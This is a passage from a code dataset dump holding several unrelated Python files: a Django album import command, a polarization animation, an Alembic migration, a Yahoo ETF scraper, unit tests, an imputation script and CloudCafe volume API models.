mode='r', encoding='utf-8') as csvfile:\n csv_reader = csv.DictReader(csvfile, delimiter=',')\n for row in 
csv_reader:\n print(row)\n artist = Artist.objects.filter(name=row['Artist']).first()\n primary_genre = PrimaryGenre.objects.filter(name=row['Primary Genre']).first()\n album = Album.objects.filter(artist__name=row['Artist'], name=row['Album']).first()\n if not album:\n album = Album.objects.create(\n name = row['Album'],\n artist = artist,\n order = 0,\n chart = 0,\n row = 0,\n date_finished = convert_date(\"1/1/2016\"),\n primary_genre = primary_genre,\n )\n\n if row['Specific Genre']:\n if '/' in row['Specific Genre']: \n subgenres = row['Specific Genre'].split('/')\n if album:\n for genre in subgenres:\n subgenre = SubGenre.objects.filter(name=genre).first()\n if genre and not subgenre:\n subgenre = SubGenre.objects.create(name=genre)\n AlbumSubgenre.objects.create(\n album=album,\n subgenre=subgenre\n )\n else:\n subgenre = row['Specific Genre']\n if album:\n subgenre = SubGenre.objects.filter(name=subgenre).first()\n AlbumSubgenre.objects.create(\n album=album,\n subgenre=subgenre\n )\n album.save()\ndef save_objects(unique_set, model):\n for item in unique_set:\n if item != '':\n if model.objects.filter(name=item).first():\n continue\n else:\n model.objects.create(\n name = item\n )\n\ndef split_subgenres(subgenres):\n # iterate over a copy: the list is mutated (append/remove) inside the loop\n for row in list(subgenres):\n if \"/\" in row:\n new_genres = row.split(\"/\")\n for genre in new_genres:\n subgenres.append(genre)\n while row in subgenres:\n subgenres.remove(row)\n \n return subgenres\n\ndef convert_date(date_str):\n if date_str:\n return dt.datetime.strptime(date_str, '%m/%d/%Y')\n else:\n return None\n\ndef clean_up():\n for obj in SubGenre.objects.filter(name__contains=\"/\"):\n obj.delete()","sub_path":"albums/management/commands/addoldalbums.py","file_name":"addoldalbums.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348224973","text":"import math\nimport numpy as np\npi=math.pi\n\ndef rep_lat_vec( k, l, m ):\n gvec=np.array([ -k+m, k+m, l ])\n return gvec\n\ndef rep_lat_norm( k, l, m):\n gvec=np.array([ -k+m, k+m, l ])\n g=math.sqrt(gvec[0]**2+gvec[1]**2+gvec[2]**2)\n return g\n\n\n\ndef Sklm( k, l, m ):\n return 2*math.cos(pi*(2*m+l)/4.)*(1+math.cos(pi*(k+l+m)))\n\ndef DebyeWaller( k, l, m ):\n g=rep_lat_norm( k, l, m)\n u=0.075e-10 #thermal vibration amplitude\n W=2*pi*pi*u*u*g*g\n return W\n\nalpha=np.array([ 0.1, 0.55, 0.35 ])\nbeta =np.array([ 6.0, 1.2, 0.3 ])\n\ntwopiaTF=0.20681\n\ndef Sum( k, l, m ):\n sum=0\n g=rep_lat_norm( k, l, m )\n for i in range(3):\n sum += alpha[i]/(beta[i]/twopiaTF**2+g**2) # accumulate all three terms\n return sum\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport seaborn as sns\nsns.set_style(\"darkgrid\")\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure()\naxon=1\nif(axon):\n ax = Axes3D(fig) #make it 3D plot\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n ax.set_xlim(-0.3,0.0)\n ax.set_ylim(-0.0,0.2)\n ax.set_zlim(-0.5,0.0)\nims =[]#array for animation\n\nx=[]\ny=[]\nX=[]\nY=[]\nZ=[]\nsumX=[]\nsumY=[]\nsumZ=[]\nsumnorm=[]\ntempsumX=0\ntempsumY=0\ntempsumZ=0\ngamma=1.53785\nalpha2=-7./9\ngy=math.sqrt(2)\ngz=-7.3\nhnorm=6*math.sqrt(2)\n\n#for num in range(10):\n#for num in range(100):\nfor num in range(50):\n k=num+1\n l=-8*num+7\n m=num\n print(np.array([k,l,m]))\n gvec=rep_lat_vec( k, l, m )\n g=rep_lat_norm( k, l, m )\n print(\"gvec\",end=\" = \")\n print(gvec)\n print(\"g norm\",end=\" = \")\n print(g)\n Vg=math.exp(-DebyeWaller( k, l, m ))*Sklm( k, l, m )*Sum( k, l, m 
)\n print(\"Vg\",end=\" = \")\n print(Vg)\n x.append(num)\n y.append(Vg)\n\n X.append(Vg*gamma*(num+alpha2)*hnorm)\n Y.append(Vg*gamma*gy)\n Z.append(Vg*gz)\n\n tempsumX+=Vg*gamma*(num+alpha2)*hnorm\n tempsumY+=Vg*gamma*gy\n tempsumZ+=Vg*gz\n \n sumX.append(tempsumX)\n sumY.append(tempsumY)\n sumZ.append(tempsumZ)\n sumnorm.append(math.sqrt(tempsumX**2+tempsumY**2+tempsumZ**2))\n \n #im = plt.plot(x, y, marker=\"o\", color = \"red\", linestyle = \"--\")\n #im =ax.plot(X, Y, Z, marker=\"o\", color = \"red\", linestyle = \"--\")\n im =ax.plot(sumX, sumY, sumZ, marker=\"o\", color = \"red\", linestyle = \"--\")\n #im =ax.quiver(0,0,0,sumX, sumY, sumZ, color = \"red\", length = 1, arrow_length_ratio = 0.1)\n ims.append(im)\n \nani =animation.ArtistAnimation(fig, ims, interval=100)\n#plt.plot(x,sumnorm, marker=\"o\", color = \"red\")\n#plt.plot(x, y, marker=\"o\", color = \"red\", linestyle = \"--\")\nplt.show()\n#ani.save('animate.gif', writer='imagemagick', dpi = 300)\n#ani.save('animate.gif')\n#ani.save('animation.gif', writer='pillow')\n","sub_path":"animation_polarization.py","file_name":"animation_polarization.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"97485715","text":"\"\"\"update models\n\nRevision ID: ed4cdbf2fac4\nRevises: da3f846cc030\nCreate Date: 2020-04-01 18:21:42.131499\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport sqlalchemy_utils\n\n# revision identifiers, used by Alembic.\nrevision = 'ed4cdbf2fac4'\ndown_revision = 'da3f846cc030'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.execute('CREATE EXTENSION IF NOT EXISTS ltree;')\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('environment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('tags',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('tag_name', sa.String(), nullable=False),\n sa.Column('path', sqlalchemy_utils.types.ltree.LtreeType(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('document',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('document', sa.String(), nullable=False),\n sa.Column('doc_type', postgresql.ENUM('article', 'court_case', 'book', 'magazine', 'link', 'other', name='doc_type'), nullable=False),\n sa.Column('doc_format', postgresql.ENUM('pdf', 'doc', 'xls', 'link', 'other', name='doc_format'), nullable=False),\n sa.Column('created_by', sa.Integer(), nullable=True),\n sa.Column('created_date', sa.DateTime(), nullable=True),\n sa.Column('document_date', sa.Date(), nullable=True),\n sa.ForeignKeyConstraint(['created_by'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('document')\n )\n op.create_index(op.f('ix_document_created_date'), 'document', ['created_date'], unique=False)\n op.create_index(op.f('ix_document_document_date'), 'document', ['document_date'], unique=False)\n op.create_table('user_environment',\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('environment_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['environment_id'], ['environment.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('user_id', 'environment_id')\n )\n op.create_table('docs_tags',\n sa.Column('document_id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['document_id'], ['document.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('document_id', 'tag_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('docs_tags')\n op.drop_table('user_environment')\n op.drop_index(op.f('ix_document_document_date'), table_name='document')\n op.drop_index(op.f('ix_document_created_date'), table_name='document')\n op.drop_table('document')\n op.drop_table('tags')\n op.drop_table('environment')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/ed4cdbf2fac4_update_models.py","file_name":"ed4cdbf2fac4_update_models.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"249994992","text":"import os\nimport sys\nimport pandas.io.data as web\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nimport urllib\nimport numpy as np\nimport pandas as pd\n\ndata_path = r'/home/jeff/Data/Download/finance'\n\ndef GetContent(page, tab):\n link = r'http://finance.yahoo.com/etf/lists/?mod_id=mediaquotesetf&tab=tab%d&rcnt=100&page=%d' % (tab, page)\n in_stream = urllib.urlopen(link)\n m_l = ''\n # Data is in the longest line.\n for l in in_stream.readlines():\n if len(l) > len(m_l): m_l = l\n # Replace special characters for BeautifulSoup.\n return m_l.replace(r'\\n', '\\n').replace(r'\\r','\\n')\\\n .replace(r'\\\"', '\"').replace(r'\\/', '/')\\\n .replace(r'\\\\/', '/')\n\ndef GetTable(page, tab):\n # Due to the ranking, these column names are missing from each tab's header.\n miss_col_name = {1: 'Intra-Day Return',\n 2: r'3-MO Return(NAV)',\n 3: r'Volumn(IntaDay)',\n 4: r'Average Market Cap',\n 5: r'Beta(3-YR)',\n 6: r'Net Assets'}\n\n max_try = 10\n for i in range(0, max_try):\n l = GetContent(page, tab)\n soup = BeautifulSoup(l)\n table = soup.findAll('div', {'class': \"yfi-table-container \"})\n if len(table) == 1: break\n print(r'tab %d, page %d, failed %d times' % (tab, page, i + 1))\n table = table[0]\n rows = table.findAll('tr')\n assert len(rows) > 1\n cols = [c.string for c in rows[0].findAll('th')]\n assert len(cols) > 4\n # add missing column\n cols[4] = miss_col_name[tab]\n data = []\n for r in rows[1:]: data.append([c.string for c in r.findAll('td')])\n result = pd.DataFrame(data = data, columns = cols)\n if tab == 1:\n return result\n else:\n return result[['Ticker'] + cols[4:]]\n\ncolumn_map = {'ETF Name': 'name',\n 'Ticker': 'ticker',\n 'Category': 'category',\n 'Fund Family': 'fund',\n # Return (Mkt)\n u'Intra-Day Return': 'return_1d',\n '3-MO Return': 'return_3m',\n 'YTD Return': 'return_ytd',\n '1-YR Return': 'return_1y',\n '3-YR Return': 'return_3y',\n '5-YR Return': 'return_5y',\n # Return (Nav)\n u'3-MO Return(NAV)': 'return_3m_nav',\n 'YTD Return (NAV)': 'return_ytd_nav',\n '1-YR Return (NAV)': 'return_1y_nav',\n '5-YR Return (NAV)': 'return_5y_nav',\n # Trading/Volume\n u'Volumn(IntaDay)': 'volumn_1d',\n 'Volume (3-MO Avg)': 'volumn_3m_avg',\n 'Last Trade': 'price',\n '52-Week High': 'high_52w',\n '52-Week Low': 'low_52w',\n # Holdings\n u'Average Market Cap': 'avg_mkt_cap',\n 'Portfolio P/E': 'pe',\n 'Portfolio P/S': 'ps',\n 'Portfolio Price/Cashflow': 'pc',\n 'Portfolio Price/ Book': 'pb',\n 'Earnings Growth Rate (ttm)': 'earning_growth',\n # Risk\n u'Beta(3-YR)': 'b',\n 'Alpha (3-YR)': 'a',\n 'R-Squared (3-YR)': 'r2',\n # Operations\n u'Net Assets': 'asset',\n 'Expense Ratio': 'expense',\n 'Annual Turnover Ratio': 'turnover',\n 'Legal Type': 'type',\n 'Inception Date': 'start_date'}\n\ndef convert_number(x):\n if not type(x) is str: return x\n x = x.replace(',','')\n if x[-1].isdigit(): return float(x)\n t = {'B': 1e9, 'M': 1e6, 'k': 1e3, '%': 1}\n try:\n a = float(x[:-1]) * 
t[x[-1]]\n return a\n except ValueError:\n print(x)\n \ndef CleanData(data):\n cols = [ 'return_1d', 'return_3m', 'return_ytd', 'return_1y',\\\n 'return_3y', 'return_5y', 'return_3m_nav', 'return_ytd_nav',\\\n 'return_1y_nav', 'return_5y_nav', 'expense', 'turnover',\\\n 'earning_growth', 'asset', 'avg_mkt_cap', 'volumn_1d',\\\n 'volumn_3m_avg', 'high_52w', 'low_52w']\n for c in cols: data[c] = data[c].apply(convert_number)\n\n if 'type' in data.columns: \n data.drop(labels = ['type'], axis = 1, inplace = True)\n\n idx = data['start_date'].apply(lambda x: type(x) is str)\n data.loc[idx, 'start_date'] = data.loc[idx, 'start_date'].apply(lambda x: datetime.strptime(x, '%d-%b-%Y').strftime(r'%Y-%m-%d'))\n\n return data\n\n\ndef GetETFTable(is_new = False):\n f = os.path.join(data_path, 'etf_table.csv')\n if is_new: \n result = {}\n for t in range(1, 7):\n result[t] = pd.concat([GetTable(p, t) for p in range(1, 17)])\n print({t: result[t].shape})\n # clean duplicates.\n result[t].sort(columns = ['Ticker'], inplace = True)\n result[t].drop_duplicates(inplace = True)\n print({t: result[t].shape})\n final = result[1]\n for t in range(2, 7):\n print(final.shape)\n final = final.merge(result[t], how = 'outer', on = ['Ticker'], sort = True)\n final.rename(columns = column_map, inplace = True)\n final.to_csv(f, index = False)\n # Clean Data MUST read from csv\n final = pd.read_csv(f, index_col = None)\n final = CleanData(final)\n return final\n\n\ndef GetTickerData(ticker, startdate, update = False):\n f = os.path.join(data_path, r'%s.csv' % ticker)\n if os.path.isfile(f) and not update: return pd.read_csv(f)\n try:\n data = web.DataReader(name=ticker, data_source='yahoo', start=startdate)\n except IOError:\n print(r'Fail to download %s' % f)\n return None\n data.to_csv(f)\n return data\n\n","sub_path":"yahoo.py","file_name":"yahoo.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"642120067","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 1 20:16:11 2021\n\n@author: glenn\n\"\"\"\n\ndef pd_series_date(s):\n return s['Date']\n\n# writes a dictionary of lists of pandas Series objects to per-key CSV files\ndef cases2csv(data_dict, folder_name, series_name):\n \n for key in data_dict:\n series = data_dict[key]\n filename = str(key) + '_' + series_name + '.csv'\n filepath = folder_name + filename\n examplePandasSeries = series[0]\n seriesKeys = examplePandasSeries.keys()\n \n with open(filepath, 'w') as f:\n \n for column in seriesKeys:\n f.write(str(column) + ',')\n f.write('\\n')\n \n for step in series:\n for item in step:\n f.write(str(item) + ',')\n f.write('\\n')\n f.write('\\n')\n \n \n \"\"\"\n with open('filex.csv', 'w') as f:\n \n firstkey = list(data_dict.keys())[0]\n examplePandasSeries = data_dict[firstkey][0]\n pandasSeriesKeys = examplePandasSeries.keys()\n \n for key in pandasSeriesKeys:\n f.write(str(key) + ',')\n f.write('\\n')\n \n for key in data_dict:\n series = data_dict[key]\n \n f.write('Region: ' + str(key) + ',\\n')\n for step in series:\n for item in step:\n f.write(str(item) + ',')\n f.write('\\n')\n f.write('\\n')\n \"\"\"\n ","sub_path":"Scripts/Transform_Case_Data/local_module/fcts.py","file_name":"fcts.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"463658879","text":"from __future__ import absolute_import, unicode_literals\n\nimport unittest\n\nfrom 
draftjs_exporter.command import Command\n\n\nclass TestCommand(unittest.TestCase):\n def setUp(self):\n self.command = Command('abracadabra', 5, 'shazam')\n\n def test_init(self):\n self.assertIsInstance(self.command, Command)\n\n def test_str(self):\n self.assertEqual(str(self.command), '')\n\n def test_lt_true(self):\n self.assertTrue(self.command.__lt__(Command('a', 10, 's')))\n\n def test_lt_false(self):\n self.assertFalse(self.command.__lt__(Command('a', 0, 's')))\n\n def test_key(self):\n self.assertEqual(Command.key(self.command), 5)\n\n def test_grouped_by_index(self):\n grouped = Command.grouped_by_index([\n Command('start_text', 0),\n Command('stop_text', 19),\n Command('start_inline_style', 0, 'ITALIC'),\n Command('stop_inline_style', 4, 'ITALIC'),\n Command('start_inline_style', 9, 'BOLD'),\n Command('stop_inline_style', 12, 'BOLD'),\n Command('start_entity', 5, 0),\n Command('stop_entity', 14, 0),\n Command('start_entity', 0, 1),\n Command('stop_entity', 4, 1),\n ])\n flattened = [(index, list(group)) for index, group in grouped]\n\n self.assertEqual(str(flattened), str([\n (0, [\n Command('start_text', 0),\n Command('start_inline_style', 0, 'ITALIC'),\n Command('start_entity', 0, 1),\n ]),\n (4, [\n Command('stop_inline_style', 4, 'ITALIC'),\n Command('stop_entity', 4, 1),\n ]),\n (5, [\n Command('start_entity', 5, 0),\n ]),\n (9, [\n Command('start_inline_style', 9, 'BOLD'),\n ]),\n (12, [\n Command('stop_inline_style', 12, 'BOLD'),\n ]),\n (14, [\n Command('stop_entity', 14, 0),\n ]),\n (19, [\n Command('stop_text', 19),\n ]),\n ]))\n\n def test_start_stop(self):\n self.assertEqual(str(Command.start_stop('abracadabra', 0, 5, 'shazam')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 5, 'shazam'),\n ]))\n\n def test_from_ranges_empty(self):\n self.assertEqual(str(Command.from_ranges([], 'abracadabra', 'style')), str([]))\n\n def test_from_ranges_single(self):\n self.assertEqual(str(Command.from_ranges([\n {\n 'offset': 0,\n 'length': 4,\n 'style': 'shazam'\n }\n ], 'abracadabra', 'style')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 4, 'shazam'),\n ]))\n\n def test_from_ranges_multiple(self):\n self.assertEqual(str(Command.from_ranges([\n {\n 'offset': 0,\n 'length': 4,\n 'style': 'shazam'\n },\n {\n 'offset': 9,\n 'length': 3,\n 'style': 'wazzum'\n }\n ], 'abracadabra', 'style')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 4, 'shazam'),\n Command('start_abracadabra', 9, 'wazzum'),\n Command('stop_abracadabra', 12, 'wazzum'),\n ]))\n","sub_path":"tests/test_command.py","file_name":"test_command.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"477658825","text":"\n\nimport numpy as np\nfrom utils import _simulate_missing_data\nfrom riddle.models.mlp import MLP\nfrom utils import evaluate\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport time\nfrom sklearn.metrics import mean_squared_error\n\n\n\ndef main(input_file_path):\n letters = pd.read_csv(input_file_path, dtype='float32', delimiter=',')\n\n x = np.array(letters.drop(['letter'], 1))\n\n y = np.array(letters['letter'])\n\n x = x.tolist()\n y = y.tolist()\n\n x = _simulate_missing_data(x, prop_missing=0.2)\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=1)\n x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.1, 
random_state=1)\n\n start = time.time()\n model = MLP(30, 26)\n model.train(x_train, y_train, x_val, y_val)\n y_probas = model.predict_proba(x_test)\n\n print(y_probas)\n y_pred = np.argmax(y_probas, axis=1)\n print(y_pred)\n\n runtime = time.time() - start\n out_dir = '/Users/ashiralam/riddle/_out_test/test_letter/'\n\n evaluate(y_test, y_probas, runtime, num_class=26,\n out_dir=out_dir)\n output_file_path = 'out.txt'\n with open(output_file_path, 'w') as f:\n print('Filename:', y_pred, file=f)\n\n\n print('Mean Squared Error: {:.4f}'.format(mean_squared_error(y_test, y_pred)))\n\n return output_file_path\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data_cleaning/imputation/riddle/imputation.py","file_name":"imputation.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"239906116","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cloudcafe.blockstorage.volumes_api.common.models.automarshalling import \\\n _VolumesAPIBaseListModel, _VolumesAPIBaseModel, _XMLDictionary\nfrom cloudcafe.blockstorage.volumes_api.common.models.automarshalling import \\\n CommonModelProperties\n\n\nclass VolumeResponse(CommonModelProperties, _VolumesAPIBaseModel):\n obj_model_key = 'volume'\n kwarg_map = {\n \"id_\": \"id\",\n \"size\": \"size\",\n \"volume_type\": \"volume_type\",\n \"name\": \"name\",\n \"description\": \"description\",\n \"metadata\": \"metadata\",\n \"bootable\": \"bootable\",\n \"availability_zone\": \"availability_zone\",\n \"snapshot_id\": \"snapshot_id\",\n \"attachments\": \"attachments\",\n \"links\": \"links\",\n \"created_at\": \"created_at\",\n \"status\": \"status\",\n \"source_volid\": \"source_volid\",\n \"image_ref\": \"imageRef\",\n \"volume_image_metadata\": \"volume_image_metadata\",\n \"os_vol_host_attr_host\": \"os-vol-host-attr:host\",\n \"os_vol_tenant_attr_tenant_id\": \"os-vol-tenant-attr:tenant_id\",\n \"os_vol_mig_status_attr_migstat\": \"os-vol-mig-status-attr:migstat\",\n \"os_vol_mig_status_attr_name_id\": \"os-vol-mig-status-attr:name_id\"}\n\n def __init__(\n self, id_=None, size=None, name=None, volume_type=None,\n description=None, metadata=None, availability_zone=None,\n snapshot_id=None, attachments=None, created_at=None, status=None,\n links=None, source_volid=None, os_vol_tenant_attr_tenant_id=None,\n os_vol_host_attr_host=None, bootable=None, image_ref=None,\n volume_image_metadata=None, os_vol_mig_status_attr_migstat=None,\n os_vol_mig_status_attr_name_id=None):\n\n super(VolumeResponse, self).__init__()\n self._name = None\n self._description = None\n self.id_ = id_\n self.size = size\n self.name = name\n self.description = description\n self.volume_type = volume_type\n self.availability_zone = availability_zone\n self.metadata = metadata or {}\n self.snapshot_id = snapshot_id\n self.bootable = bootable\n self.attachments = attachments or []\n self.created_at = created_at\n self.status = status\n self.links = links or []\n 
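# The attributes below mirror OpenStack's extended / namespaced volume keys\n # (imageRef, os-vol-host-attr:host, os-vol-tenant-attr:tenant_id,\n # os-vol-mig-status-attr:migstat and :name_id), as listed in kwarg_map above.\n 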
self.image_ref = image_ref\n self.source_volid = source_volid\n self.volume_image_metadata = volume_image_metadata\n self.os_vol_host_attr_host = os_vol_host_attr_host\n self.os_vol_tenant_attr_tenant_id = os_vol_tenant_attr_tenant_id\n self.os_vol_mig_status_attr_migstat = os_vol_mig_status_attr_migstat\n self.os_vol_mig_status_attr_name_id = os_vol_mig_status_attr_name_id\n\n @classmethod\n def _json_dict_to_obj(cls, json_dict):\n volume = cls._map_values_to_kwargs(json_dict)\n volume.attachments = _VolumeAttachmentsList._json_dict_to_obj(\n volume.attachments)\n volume.links = _LinksList._json_dict_to_obj(volume.links)\n return volume\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n\n namespace_kwargs = {}\n namespace_kwargs[\"os_vol_host_attr_host\"] = \"host\"\n namespace_kwargs[\"os_vol_tenant_attr_tenant_id\"] = \"tenant_id\"\n namespace_kwargs[\"os_vol_mig_status_attr_migstat\"] = \"migstat\"\n namespace_kwargs[\"os_vol_mig_status_attr_name_id\"] = \"name_id\"\n\n for local_kw, expected_stripped_name in namespace_kwargs.iteritems():\n for element_name, element_value in element.items():\n _, _, stripped_element_name = str(element_name).rpartition('}')\n if expected_stripped_name == stripped_element_name:\n kwargs[local_kw] = element_value\n\n volume = cls(**kwargs)\n volume.metadata = _XMLDictionary._xml_ele_to_obj(element)\n volume.volume_image_metadata = _XMLDictionary._xml_ele_to_obj(\n element, 'volume_image_metadata')\n volume.attachments = _VolumeAttachmentsList._xml_ele_to_obj(element)\n volume.links = _LinksList._xml_ele_to_obj(element)\n return volume\n\n\nclass VolumeSnapshotResponse(CommonModelProperties, _VolumesAPIBaseModel):\n obj_model_key = 'snapshot'\n kwarg_map = {\n \"id_\": \"id\",\n \"volume_id\": \"volume_id\",\n \"name\": \"name\",\n \"description\": \"description\",\n \"status\": \"status\",\n \"size\": \"size\",\n \"created_at\": \"created_at\",\n \"metadata\": \"metadata\",\n \"os_extended_snapshot_attributes_project_id\":\n \"os-extended-snapshot-attributes:project_id\",\n \"os_extended_snapshot_attributes_progress\":\n \"os-extended-snapshot-attributes:progress\"}\n\n def __init__(\n self, id_=None, volume_id=None, name=None, description=None,\n status=None, size=None, created_at=None, metadata=None,\n os_extended_snapshot_attributes_project_id=None,\n os_extended_snapshot_attributes_progress=None):\n\n super(VolumeSnapshotResponse, self).__init__()\n self._name = None\n self._description = None\n self.id_ = id_\n self.volume_id = volume_id\n self.name = name\n self.description = description\n self.status = status\n self.size = size\n self.created_at = created_at\n self.metadata = metadata\n self.os_extended_snapshot_attributes_project_id = \\\n os_extended_snapshot_attributes_project_id\n self.os_extended_snapshot_attributes_progress = \\\n os_extended_snapshot_attributes_progress\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n\n namespace_kwargs = {}\n namespace_kwargs[\n \"os_extended_snapshot_attributes_project_id\"] = \"project_id\"\n namespace_kwargs[\n \"os_extended_snapshot_attributes_progress\"] = \"progress\"\n\n for local_kw, expected_stripped_name in namespace_kwargs.iteritems():\n for element_name, element_value in element.items():\n _, _, stripped_element_name = 
str(element_name).rpartition('}')\n if expected_stripped_name == stripped_element_name:\n kwargs[local_kw] = element_value\n\n snapshot = cls(**kwargs)\n snapshot.metadata = _XMLDictionary._xml_ele_to_obj(element)\n return snapshot\n\n\nclass VolumeTypeResponse(_VolumesAPIBaseModel):\n obj_model_key = \"volume_type\"\n kwarg_map = {\n \"id_\": \"id\",\n \"name\": \"name\",\n \"extra_specs\": \"extra_specs\"}\n\n def __init__(self, id_=None, name=None, extra_specs=None):\n\n super(VolumeTypeResponse, self).__init__()\n self.id_ = id_\n self.name = name\n self.extra_specs = extra_specs\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n volume_type_obj = cls(**kwargs)\n volume_type_obj.extra_specs = _XMLDictionary._xml_ele_to_obj(\n element, 'extra_specs')\n return volume_type_obj\n\n\nclass VolumeListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'volumes'\n ObjectModel = VolumeResponse\n\n\nclass VolumeSnapshotListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'snapshots'\n ObjectModel = VolumeSnapshotResponse\n\n\nclass VolumeTypeListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'volume_types'\n ObjectModel = VolumeTypeResponse\n\n @classmethod\n def _xml_ele_to_obj(cls, xml_etree_element):\n obj_list = cls()\n for element in xml_etree_element:\n if element.tag.endswith(cls.ObjectModel.obj_model_key):\n obj_list.append(cls.ObjectModel._xml_ele_to_obj(element))\n return obj_list\n\n\nclass _VolumeAttachmentItem(_VolumesAPIBaseModel):\n kwarg_map = {\n \"id_\": \"id\",\n \"device\": \"device\",\n \"volume_id\": \"volume_id\",\n \"server_id\": \"server_id\"}\n\n def __init__(self, id_=None, device=None, server_id=None, volume_id=None):\n super(_VolumeAttachmentItem, self).__init__()\n self.id_ = id_\n self.device = device\n self.volume_id = volume_id\n self.server_id = server_id\n\n\nclass _VolumeAttachmentsList(_VolumesAPIBaseListModel):\n list_model_key = 'attachments'\n ObjectModel = _VolumeAttachmentItem\n\n\nclass _LinksItem(_VolumesAPIBaseModel):\n kwarg_map = {\n \"href\": \"href\",\n \"rel\": \"rel\"}\n\n def __init__(self, href=None, rel=None):\n super(_LinksItem, self).__init__()\n self.href = href\n self.rel = rel\n\n\nclass _LinksList(_VolumesAPIBaseListModel):\n list_model_key = 'links'\n ObjectModel = _LinksItem\n","sub_path":"cloudcafe/blockstorage/volumes_api/v2/models/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":9536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441427936","text":"import numpy as np\nimport bi_inout\n\n\ndef safe_inverse(arr):\n arr = arr.copy()\n bad_inds = np.where(arr == 0)\n arr[bad_inds] = 1\n arr = 1./arr\n arr[bad_inds] = 0\n return arr\n\n\ndef makeFFTGrid(shape, resolution=1.):\n \"\"\"\n Creates a grid in which each element is proportional to the\n distance from the point to the origin (with wrapping).\n The distance between neighboring grid squares is 1/(n*resolution).\n \n >>> utils.math.makeFFTGrid(10, 2.)\n array([ 0. , 0.05, 0.1 , 0.15, 0.2 , 0.25, -0.2 , -0.15, -0.1 , -0.05])\n \n >>> utils.math.makeFFTGrid([5,5], 1.)\n array([[ 0. 
